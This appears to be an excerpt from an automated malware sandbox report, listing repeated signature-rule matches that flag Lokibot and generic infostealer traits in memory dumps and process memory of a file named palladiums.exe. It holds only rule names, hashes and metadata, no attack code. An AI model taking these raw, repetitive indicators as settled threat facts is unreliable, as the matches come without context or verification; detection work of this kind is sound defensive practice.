                Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: Process Memory Space: palladiums.exe PID: 7092, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7220, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7364, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: palladiums.exe PID: 7432, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
